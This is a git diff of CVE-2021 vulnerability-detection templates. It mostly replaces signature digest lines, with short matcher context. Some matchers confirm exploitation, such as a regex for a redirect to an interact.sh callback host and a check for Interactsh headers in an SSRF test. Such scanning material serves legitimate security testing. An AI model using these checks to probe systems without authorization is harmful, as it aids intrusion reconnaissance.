4b0a00483046022100f56157cdfe11052f9683e3d1e537fa7c3597f6f58f376cbe3c55d1d4152a71d3022100d91870d067693baa163178f83d1a79311a718a354422a707e8b845af54b2bac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index 3ee7325bae..3a76e3a915 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100860677e3cb649f8221c48f8da8c476eaff6ae5218cc6f264058729a4175edb3d022100cde954092485d59c153fd0f1cbf309acc275463b5deb833deb6be569958419ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201737588b1087e5a4619955fe2a940685f0fda3bf66bf1e41cf7ebfa3d47389e402207ee672e47fd531b7a5d9b488aa08d95bcdff982987689acec457d3797c75c924:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index 6e86dbf827..c660bc9ad7 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008dc817a42d582540241a41c989a303ff874434de3f13d3696356f016dbbf7d26022078549e217e3ab9625e7da831d7b6b2071ed2f72bbeb8bc3adfa87b37e2c507e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ab926b1490fc289a0ea742ed2479c9b24c7b4661c1de6e9e810ba3d73d14fdcc022048cb38a850976e6bb62ba717194a8b14ce2836bb7cec53a7ca3823f8cd79dce9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index c045da6fdf..2f2ba91351 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml @@ -65,4 +65,4 @@ http: - type: dsl dsl: - "status_code_2 == 500 && status_code_3 == 200" -# digest: 4a0a00473045022100bd23716f1545a3d6b6f9928e16ff24594ad46444ca7f5d2b0ff5781948e287ef0220786b038ec0a0a3a94e2643bab4e9fb9f4be5dfaf7002efdc42df3856ca18feeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201fc4c52886357c27e6af814954a33971f007d23cb05741475609c643c4d5a7f80220164a544ac3d34b939bd3efefd157aa7e02c9fba303f6cd5269e1f997159a1e49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 9930c91415..799838e4af 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -55,4 +55,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body -# digest: 4a0a00473045022100ef2253e929975a34d563cf49ee7d028f01b7b8ca671e9e6062d5b2e76c1b96ce0220201a5a0ee0a5890537e41ca1f1c7aad20a621a30e07153368fec670ab9cf4355:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022060e173a6dda99c14036b4bf367bf38342fac18b275d36e5a0e7286b912fd3ffc02210086f7f0e86c9ffb8b728c7414a7f8dcfe3d1ffb8c2493f8a05c563fbec33ff95e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index 347f5ab75d..bd75777b90 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022049e77e74d7aa840c78bbc69fb100df9024897e4f9f0d9da80142b94f41067170022023e19aae9ff59fbcc630d762ee87f2ad1060e790de1227e9d1ea3819ee33d6d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4c54e2101d5771fb2126256511522a98c666533ee7712f2a45521a7a0f799270220518eda59726c72b34c97b2c12af0322bce2e6f98b97fed5cd71cf2ded4c6e046:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index c2fccad391..9398217562 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -79,4 +79,4 @@ http: regex: - type="hidden" value="(.*?)"> internal: true -# digest: 4a0a0047304502203de2b7d77a5529f357bcb560788f606818ec0078bd7dcc73e59424f576c7942b022100a391c11b19858fea9384a4e52929faca2c4b92472a5ce98f7ec6c5c8394c238a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e74f9ac2c2f510a6a5cc881445af090226068bbbf1a6ce1faf4e243977148e9b0221008cfa692be823cb8b62ef4510c769823c0aca951e4ba3696cf56bef2e21d0f23b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index 506d8feeaa..7b926dce94 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dab8ab75c1d3700a4c024ce898811f0c0b7996a779ae942f9fc9188869df37cd02210081e4282e11fdf1602ccae821ef099b54a525e0b35d859eda274a52c43b18dbd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203e71a7a4dfa97560003b93adc24041a245cae3af11c121afdde3bc106492e7e002207b909987ee42203897f0a3976aa0330600c2897283f195497c01641fdab773e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 32919c3b3f..4b4fe50d76 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a40d9a2b0cb51dca3b3b675cf715f18ccc4bd7714edd7220f7ec9bd934962f330220442c8f143684b18004b46f89d1886b6905cbb55977566ce1452887fcfd509d4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200132d28b9ece1813c2cbff293d1769670075b3a8fc3e668bed95a068ed7993c80220557dec056c887098af52c27ba581fc7e7d6f4151e9b37b2edadbd1a693f0c329:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index 981649fa78..b8172d9f51 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -48,4 +48,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "pagination") && contains(body, "data")' condition: and -# digest: 4a0a0047304502204b3206034be2f774b8b91870d6386c1beadd44650a52a79e394ef377b8fd8a7e022100be385f84a4f30de70a9f03f2813758d984dbe67e2d2ddbdf8ffb06f772ea2772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022068741ea24b809bbe7b0808375c237dc88233f8558be48aa5f2a5267c9b309194022100ec56309db868de2bc5d68b88832f2313b46ae7b792ee6e338c40e61c39568b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index c5a4ea9ab3..62ac984652 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fe062755f4b07576ae5328bf856241f5ea8ffcd7471aee2f20d0e81118a750f7022100963f6ecde4366021315b1d07dede1e4330917c47e2ac4b7068b9c2496b1cc675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022009a97f597a540e6741f3229b70b1b29fa0a641ce0915cd34c494cea557874333022031a39d9dc34a51219e3281440d3bfefc61c0be8ec107cb5903f637348fa7675f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 6ffd29adeb..5286baaf02 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022018328f164b60172c333f6c40599f821c588213819031a1e9a2fc07c9e6f3fe74022100dc1c8beb95c9ea2da8dbf9b90d938190782ff387c7a21e0c44387234f04094fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078990d8e76d7d0907f53325cf4377dffd1589c040424ba73eed6ea24d08167a8022100dc794e1260b3b791daed6f880cdb41518a2a4f9b170fd99319c356adb635b0cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index 9c48a5c1ab..63bb0460c4 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210093c2ed5b393a57e102799fbb901df39eee9afaf5c1113fb777dd86d1218e7434022100a0402cece1c5f7f2527b421dfde31d2a5ac624e7223448265e76ab4c24d85271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210081a3f1d940c56de47725f8a715b7af3cb5dd521abf1d0fe0ec0d5717ad5d1b7c02200c7c246a4c5e1887f0b04c21810d1950c5091535d576a87d7941b0d956d2a891:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index 5bddc86dcb..aa96d11e4c 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022045ba9ff8302706637947b44449b56a71b13f3b6d7038baa5c14980a6a1b951ed022100cb6dd26851e8c38528eb8ab2c68b2e3e7378d728c04da0e44b42ab87752924ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b8cf99898eb4e0b35c557c93898716ae32358b101a4ed8d4017383d874cfe87202206e7cf5d8562794d68f0ec7444e9b34b3aa9dbab856202e846777e8dbc7de89e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index 5673dc3ced..31fdb0043c 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 4b0a00483046022100d016209aa95f121aad60021186d6a2c56623b790d5930cdffd96e00fdb5d2cbe022100e6536c22659a8f7fa88f0fa35686a7ad134c968f613c7471a7c3f6413618ee25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a70a7f35b960fece64c3923d415e8d8d093c3b64e0bf91ec7780c1feb4429e80221008ce9c58c3d00728d31eba4e7e89412be2bd7044ab133bc6e2caddea02a7ba66d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index adbe2c9f08..aee3e04b55 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022073d439d60074e5d1c5d1337480dffdffea8f90c2d58d768b7d08a2c4498f585a02201a7e02758d8c5b5caf499e37224e8921c170b88c2dcc0be46064b4d10546f7d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f67ff446428cbaabbc3fbcd9a29b01b1ab220221767f2b5834e1abe70ba95ce02205a46ec53896c9c2628f41578ebdb0ce5f9f9a3e8c71b06fe6ee90d2543ac9a78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index 739563d63a..0fe67cdf97 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202f6a6f1686de8b8b85a4c8c0e8a49bd69f1628bbea7bfd64bdfac2257741b25d022100f6dc5b8e874a47e6c22fa0f1890e646ce7ad62634e7547f215f4c2099198cd43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008111d303ca6b6f56a2e50b1210b78146af0036e79f0ebf56930f5be7d0ab7475022100e3506e8d151fd899d096f197f4984c79bd88ce9fa29b71d151194eae4ca97a80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml index bd5031e0cc..4f1e22820e 100644 --- a/http/cves/2021/CVE-2021-40323.yaml +++ b/http/cves/2021/CVE-2021-40323.yaml @@ -109,4 +109,4 @@ http: regex: - '(.*?)' internal: true -# digest: 4a0a0047304502206e4478c33e50a35d84d860a861a9f49e8343e5484089045ce8b3093e6faeac1a022100c816efd13f1937362330d8066062d1062b62bdd6a54dce8356e799717937f527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c045c74789870365f66a86a879b7c4ea9b37baab9553ea87f0caaacf2f8d0c1e02205b0041d6d08c291c6d1effbf614bc326be46b05618c6ac25c13595f1d88cabf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index c55c863ca9..c406d6e7a6 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -42,4 +42,4 @@ http: - 'contains_all(header, "X-Interactsh-Version", "Server: oast")' - "!contains(body, '

Interactsh Server

')" condition: and -# digest: 4a0a00473045022100d8d05e6148126d10da099a868bd043059ea9cd59f882302a022663b194f4cbab0220434cac7a775e4c4845de5dd47b83c2c14723db31dcf51b091617be23b576b578:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201f9fbcee7dc1fc44a099c7f645d35d5693eeefa792f7825bcc51ed8b777174250221009e077fff03377fddd575987dba137468656114a1b15df68fb847b4cc71f2bf2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 75165cd98f..6ad3d31280 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -120,4 +120,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c74e11c1bfb9c715d80f1c403010aa5a992ece98f99ff25aa12b5fdf7a4fe71c0220030dae45c7af30b2d89b390eb53b6bb2b534cf8be0e7c98a0cf98e490434fa5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200c53718fe980c8c145d3bf51515b9321e47bfaaf917a47caad718a3a380fb9430220718d7de44ecda49d098a76d52400dd0ba5c209a38e2f6354ce554bdba5b16220:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index f814c685c7..4a0cccf2d0 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201bf834abd657937ae412fc33a7d71f6d59db79266d9801d409f0d7d74274f0ad022100aefd147e291833eaf15cba8577654e79cf08eaacfc518e271ddb56bf1246c490:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009deec4503a27481a39cbbd347424004f99b058a0a1a7f67d305f399baf9f467f02206bc9ce592299166b2928e8be08cffa8837c7ed8de82317de6532ec958c2cb82f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40651.yaml b/http/cves/2021/CVE-2021-40651.yaml index 7b03ac2e4c..cff6b6172a 100644 --- a/http/cves/2021/CVE-2021-40651.yaml +++ b/http/cves/2021/CVE-2021-40651.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_1, "openSIS")' - "status_code == 200" condition: and -# digest: 4b0a00483046022100b777c6dc91c4e0b6009c87ff6f67a70d09e714c2bd6a19cae6029a079bffc337022100936149daaf5ffa9f58ed3a99dc2885caedd9aa5ddc873eb8b48eff764af3110d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100afc93af4ca71f78a66e289814973251a2fd69ed04dc9706b2033433f6cd71eec022100a0c2d05f94752f57f256120d5a78d05308e06c79adedadf48590890eb55fda30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index 140ba31264..7ce8ebe2e6 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210097677b11bc4965e4caadab5f77264e9a0e4a19a059a4c5e5269a6aff5c98b76e022015b1d85cb9b06c62a60bfe3cf6f89fb25cc22fb593d23eb92e858bc117b5b1a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d42d578672d94412d65c62a6441dc5ae3d6bdbcdcb52205a0f76b738f59bae2b022100e4aaee8b8d9b419de8d5215bd7ea2528e62a6adc0b71a29e92c42c2e4332af00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index 892fd6e7f5..d4fd926475 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201c3cd3fcfe337c0c3bf3f141e268c4cb3e002423d6e3548ff23bcbd491c3985f022100ea3bc691a51662cc8e63a76bfd75b8dd912d1a978fee1f84bb0fc26d13aff053:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd286420b08ecdab35c1dc01933f9d6ffb349a3c20f171ff32df173ed7a03638022002afe6367292693215736639592427f781d98e530958204e37adec564e7b7cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml index 3882bb576c..c035151ef7 100644 --- a/http/cves/2021/CVE-2021-40870.yaml +++ b/http/cves/2021/CVE-2021-40870.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eba320c7da3c4834ff65ad026efb26ae57c68bb259202093673bff5e18f5c628022100d03e87ea7cb81a79856da54bce64f0dd96c4d08a5bcc15d7aa122dec8bc4cda3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220257c5d9d7cb617d8a133b3cfd6ed8590058baf0a198d28412a57a15510d6fab102210086a0b871ba6ae585267bfa7b19077aaeaeee17d006fc51b468fb20a68f1d21b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 00709d33e3..2fd3636a6b 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207646eee4aa56e0329051709dffce67b5a0edf5f25c7eb190e70efc6d1b7b6f8c02202b08a5b0dd6adc756b48637e62ccc41bc5216d7b2207c2e52a2ff701a708d1e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e40b07ad6becf60cf253cbf6f3c6333cd310e4bb45c38dee267dc7bfd4df626022044455d3d273af8f226531b6bef7faff64094cb241671e0b8f2cf623346345179:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml index fea5baad9f..00697c5f2e 100644 --- a/http/cves/2021/CVE-2021-40908.yaml +++ b/http/cves/2021/CVE-2021-40908.yaml @@ -46,4 +46,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "status\":\"incorrect\"")' condition: and -# digest: 4a0a00473045022100e6f6b36eba8496c9a593169aab8d1c95a86ab766f8a7b6ff30f96d2d5d78e45b022054ee34ff5a00ffd01500719d1a15661146d35eb17a7224a0a24f38c5519de6bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d9682cdcb8a39247b1f2923f30931761018c186957eca58eef1294ee24c2fa9022100dd83265eb60eb8119663c8d5805b5654203d946f4cf1ee4cb28f0414ac670ca6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index 50a8575067..e72f35da1f 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206dba6a431dc30930ad050e7f834b22acc257437f9ac33a3d996fcc702e3aa15802205f6714478f7cfa16218ab6510bd7d4dd9093ad29ce7722c5b0e8a4fee8aa45f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203511b1cb2f7a8cd1729b55ab1f8915b3f30176b7b4eae5c9bd1be8fcf97e283502206204cbe58595dcb38370fe4d484c219c311df12cd6167045da3a30e893057574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index fa6db19a24..f6b66bcae2 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207085af68079243c3f162206c08f5bfc2c11e35d92aa24107a9a989d42674176e022100c72473d3a42f86cc061bb8fec67780356ca1769c35fa52f444ff3316f6674779:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205ec22a8c6f56f813625860d130e84ec88b50d3ac8b11f204d2af13a940bf663e022100dfa8b5515e53d1766d3cf8adc5a7287c3b90c0e3561aad887fd3417015e44469:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 9d92f16b48..7c6b121592 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bacabdca74f9c9fbae5381ac0a8ef79f2c5702cb4c709e6194bfeb4213c503e902203c7a3b7376f619852ee754a987330645eee544784fe9acd88459eb72f7029e7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206578ad56fe12b3717623febd88c16fa3cba460c41b778647f1a0db70973c379a022100c159963d168a9c326192172b2c1947dcddd02b144f591f97881e82f24aa8afa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index 89c0bf68ef..40fdece004 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220018fbd142442b644347ff23fb7ff5fae090cbd6180d4bae07df55618e3576c9002204f369d1032ff131cbf6c6bd4b8e1394b6b238418b68862884580300adb61e42b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203170f8da497c334096768ec8746961b30aeff00c01e06d9a9bdd6f9e6882f976022100a86c9e9cc5579d81b89be6201ce51f8495bf94bd872326e88e2d390df55662b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index bc2ed51d6b..537c65b870 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202757edffd7b33049b4800f2a103e17130c6a711e551b6c494103f56e468676c2022100f5e21ea7300875d7fc8fddbc5308c309b8637309b4b14ffa1e252ef9e82955e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201153f232729b91bd3e71a6b6d6e98653249cabfb5d7cd39d08ee1f7959bd87dc0221009a509c44b3856076f6de262873ab1443d5d8c17bc9d8c9ba5b9087f46907c9e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index 3a356e0df3..1e73d70438 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022073aa701bbd4649f3814518c9b0fd5f4dae20221785bc65f0e16eb1352444cd05022066909db2e804aff7795a0f544ba36d182e0a3f49d67735b1434b4a5d05a298e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206710e69599921a61cfa9195cd270abfa17826fd524db0ecac89afc222476c7a40220511b892349f56025fa5e3917d204da9c68deb4808260c5f09c006048176c6d0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml index 4373d3e6c5..ab6e7c71c1 100644 --- a/http/cves/2021/CVE-2021-40978.yaml +++ b/http/cves/2021/CVE-2021-40978.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d3f8bfca9ff864b5abf41834779fd591efcbfccda6cd6d38a6edd71e4e6d97c022042f51441b7d5514ffd65f8467500374e8e43b594839c46aa9ca5cd6aa754e558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e80fd425b53f7f35d7683c5353de18764fa1a87380a6e038061ebfd196dc45f302201a7aebcc35cbd2b3b5004ddaa381b9fd3117d7b7fbee65257c3df158e25c1f7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index f54de54a16..ca11695bcc 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -59,4 +59,4 @@ http: group: 1 regex: - '"subTitle":"Grafana ([a-z0-9.]+)' -# digest: 4a0a004730450220733d9c9b0886194993d30c8b74ff942bf173ce98bc4618221bada7e54cc36574022100d4fe7afdb96b7f8631d53583b1d36f658e8156a630ce09b79dc52b60b73a80e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220150df20c5506e437af900f037ffb9c5f34c2d30fbbf6958817e8b423bbf601b6022032ca7a2df86fa3dc88fabbe5b0448eb47690fed488f140dddb8ffc0a4ae0293c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 892ac67cf2..e0f6ad0482 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d41f20bacb64537c7ebc1f93a45af8685a507b6da99f0a122c733d0656cfcb5d022100eccec5cfa1f9c7487c61db7db3b808555117ca0dea3a276f1b81ada31e9fe969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b430161d4f67406d937f021501632a776b165e88766fe5aac19d7543e61cd54602202a8caef664b263d6de002809871fa56a635aaa6b25224efac19f5c6207e96eff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index 7ae351c658..27f7ab7a39 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -54,4 +54,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a004630440220350c5cacd0b231c91cdf48cda99ca1fc36a943c4e8b30342fabb9e5d0e1e7da50220450b72c0220ec3d7731717f613df423ce4f6468614feeb9c732013fb4702ba9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100883edb38fcae19e59f27d4186083d3d877ea6f3d4ac06f23a39aac3333eee128022100f3bca54269374c671b4aa37fe5d75bb65720a084359beded0ddb553286263455:922c64590222798bb761d5b6d8e72950 